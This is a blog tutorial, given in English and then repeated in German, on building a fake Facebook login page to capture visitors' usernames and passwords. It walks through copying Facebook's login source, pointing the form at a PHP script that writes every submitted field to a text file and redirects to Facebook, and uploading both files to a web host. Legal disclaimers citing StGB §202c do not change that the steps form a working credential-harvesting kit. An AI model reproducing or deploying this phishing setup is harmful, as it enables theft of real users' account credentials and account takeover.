Loading…
Eine Facebook Phishing-Seite erstellen

Create a Facebook phishing page

In this tutorial, I’ll show you how to create a Facebook phishing page to catch usernames and passwords that can hack other users’ Facebook accounts.

But this knowledge should never be used to hack foreign Facebook accounts. It is simply not legal, in Germany it violates the Criminal Code StGB § 202c.

Please also read the disclaimer.

But for aspiring and ethical hackers, it’s very valuable to understand how phishing works. Not only does it help prevent bugs that threaten your safety and privacy, it also helps you spot phishing sites.

What is phishing?

Phishing means intercepting user data such as username and password with a fake website. The fake phishing website is basically an imitation of the original website, like Facebook here. Attackers often use this method to steal usernames and passwords. Most often, the process works as follows:

A user clicks on a link to a phishing website. Believing that he is on the real website, he enters his credentials. There’s only one problem. The victim of the attacker entered his private information on the website of a hacker. And now the hacker has the sensitive access data!

For example, if it is a company’s Facebook profile, it can hurt the company significantly. In this tutorial, I’ll set up a fake Facebook login page to show you how easy it is to run a phishing attack.

Create a Facebook phishing page – Tutorial

Required equipment

Step 1

Open the website www.facebook.com.

eine_facebook_phishing-seite_erstellen

Step 2

Then right-click an empty area of the login page. At this moment you are not allowed to be logged in to Facebook. Open the “Show page source text” feature (google Chrome browser).

eine_facebook_phishing-seite_erstellen

Step 3

Copy the entire source code of the page and paste it into a new Notepad document (or in the plain text editor of your operating system).

Step 4

If you are using Notepad, press “Ctrl F” and look for “Action =“.
You should see a line that looks like this:
action = “https://www.facebook.com/login.php?login_attempt=1&1wv=110”
Delete everything inside the quotes and paste “post.php” instead.
Save this file to your computer with the filename index.htm.

eine_facebook_phishing-seite_erstellen

Step 5

Next, create a new Notepad document called post.php. Copy the following code and paste it into the document. Then the document can be saved.

header (‘Location:http://www.facebook.com/’);
$handle = fopen(“usernames.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “rn”);
}
fwrite($handle, “rn”);
fclose($handle);
exit;
?>

Step 6

At this point you should now have saved two files:
index.htm and post.php

Next, this code actually needs to be uploaded to a web hosting service. There are free hosting providers, but I would not recommend that you actually publish this code online. From then on, you would commit a crime. Because once the phishing site is online, it could be accessed by any Internet user. Already the preparation of spying and interception of data is punishable!
Therefore, I refer here once again to the disclaimer.

Step 7

After the created data index.htm and post.php have been uploaded, the Facebook phishing page is ready.
If you now click on the link to the index.htm file, the created Facebook phishing page will open. This should look almost identical to the Facebook login page. If a victim now enters his user data, a text file named username.txt is automatically generated on the web server. This file now contains the sensitive user data of the victim.

Conclusion

Creating a Facebook phishing site is really easy. Copy the code from the Facebook login screen, add some PHP code and make it available online. Please do not do this on a publicly accessible web server, the criminal consequences could be terrible for you. However, in a home environment on your own offline server, this tutorial will give you a good idea of how attackers can access usernames and passwords. Of course, a Facebook account can also be hacked with a software or hardware keylogger. A tutorial on the AirDrive Hardware Keylogger can be found here – AirDrive Hardware Keylogger with Wi-Fi.

Loading…
Eine Facebook Phishing-Seite erstellen

Eine Facebook Phishing-Seite erstellen

In diesem Tutorial zeige ich dir wie man eine Facebook Phishing-Seite erstellen kann, um Benutzernamen und Passwörter abzufangen, mit denen die Facebook-Konten anderer Nutzer gehackt werden können.

Aber dieses Wissen sollte niemals dazu benutzt werden fremde Facebook Accounts zu hacken. Es ist einfach nicht legal, und verstößt gegen das Strafgesetzbuch StGB § 202c.

Lese dir dazu bitte auch den Haftungsausschluss durch.

Für aufstrebende und ethische Hacker ist es aber von großem Wert zu verstehen, wie Phishing funktioniert. Es hilft nicht nur Fehler zu vermeiden, welche deine Sicherheit und deine Privatsphäre bedrohen, sondern hilft dir auch Phishing-Seiten zu erkennen.

Was ist Phishing?

Phishing bedeutet Nutzerdaten wie Benutzername und Passwort mit einer gefälschten Webseite abzufangen. Die gefälschte Phishing-Webseite ist im Grunde eine Nachahmung der originalen Webseite, wie hier am Beispiel von Facebook. Angreifer verwenden diese Methode häufig, um Benutzernamen und Passwörter zu stehlen. Am häufigsten funktioniert der Prozess wie folgt:

Ein Nutzer klickt auf einen Link zu einer Phishing-Webseite. In dem Glauben, dass er sich auf der echten Webseite befindet, gibt er seine Zugangsdaten ein. Es gibt nur ein Problem. Das Opfer des Angreifers hat seine privaten Informationen auf der Webseite eines Hackers eingegeben. Und jetzt hat der Hacker die sensiblen Zugangsdaten!

Wenn es sich beispielsweise um das Facebook-Profil eines Unternehmens handelt, kann dies dem Unternehmen erheblich schaden. In diesem Tutorial werde ich eine nachgemachte Facebook-Login-Seite einrichten, um dir zu zeigen, wie einfach es ist einen Phishing-Angriff durchzuführen.

Eine Facebook Phishing-Seite erstellen – Tutorial

Benötigtes Equipment

Schritt 1

Öffne die Webseite www.facebook.com.

eine_facebook_phishing-seite_erstellen

Schritt 2

Klicken dann mit der rechten Maustaste auf einen leeren Bereich der Anmeldeseite. In diesem Augenblick darfst du nicht selbst bei Facebook angemeldet sein. Öffne die Funktion „Seitenquelltext anzeigen“ (google Chrome Browser).

eine_facebook_phishing-seite_erstellen

Schritt 3

Kopiere den gesamten Quellcode der Seite und füge ihn in ein neues Notepad-Dokument ein (oder im einfachen Texteditor deines Betriebssystems).

Schritt 4

Wenn du Notepad verwendest, drücke „Strg F“  und suche nach „Aktion=„.
Du solltest eine Zeile sehen, die folgendermaßen aussieht:
action = „https://www.facebook.com/login.php?login_attempt=1&1wv=110“
Lösche alles, was innerhalb der Anführungszeichen steht, und füge stattdessen „post.php“ ein.
Speicher diese Datei auf deinem Computer mit dem Dateinamen index.htm ab.

eine_facebook_phishing-seite_erstellen

Schritt 5

Als nächstes erstelle ein neues Notepad-Dokument mit dem Namen post.php. Kopiere den folgenden Code und füge ihn in das Dokument ein. Anschließend kann das Dokument gespeichert werden.

header (‘Location:http://www.facebook.com/’);
$handle = fopen(“usernames.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “rn”);
}
fwrite($handle, “rn”);
fclose($handle);
exit;
?>

Schritt 6

An dieser Stelle solltest du nun zwei Dateien gespeichert haben:
index.htm und post.php

Als nächstes muss dieser Code tatsächlich zu einem Webhosting-Dienst hochgeladen werden. Es gibt kostenlose Hosting-Anbieter, aber ich würde dir nicht empfehlen, diesen Code tatsächlich online zu veröffentlichen. Ab diesem Zeitpunkt würdest du eine Straftat begehen. Denn sobald die Phishing-Seite online ist, könnte sie von jedem Internet-Nutzer aufgerufen werden. Bereits das Vorbereiten des Ausspähens und Abfangens von Daten ist strafbar!
Ich verweise daher hier noch ein weiteres mal auf den Haftungsausschluss und auf das Strafgesetzbuch StGB § 202c.

Schritt 7

Nachdem die erstellten Daten index.htm und post.php hochgeladen wurden ist die Facebook Phishing-Seite fertig.
Klickt man nun auf den Link zur index.htm Datei öffnet sich die erstellte Facebook Phishing-Seite. Diese sollte fast identisch mit der Facebook-Login-Seite aussehen. Gibt ein Opfer nun seine Benutzerdaten ein, wird auf dem Webserver automatisch eine Textdatei mit dem Namen username.txt generiert. Diese Datei enthält nun die sensiblen Benutzerdaten des Opfers.

Fazit

Eine Facebook Phishing-Seite erstellen ist wirklich einfach. Den Code vom Facebook-Login-Bildschirm kopieren, etwas PHP-Code hinzuzufügen und alles online zur Verfügung stellen. Mache dieses aber bitte nicht auf einem öffentlich zugänglichen Webserver, die strafrechtlichen Konsequenzen könnten schrecklich für dich sein. In einer Heimumgebung auf deinem eigenen Offline-Server bietet dir dieses Tutorial jedoch einen guten Einblick auf die Frage, wie Angreifer an Benutzernamen und Passwörter gelangen können. Ein Facebook Account läßt sich natürlich auch mit einem Software oder Hardware Keylogger Hacken. Ein Tutorial über den AirDrive Hardware Keylogger findest du hier – AirDrive Hardware Keylogger mit Wi-Fi.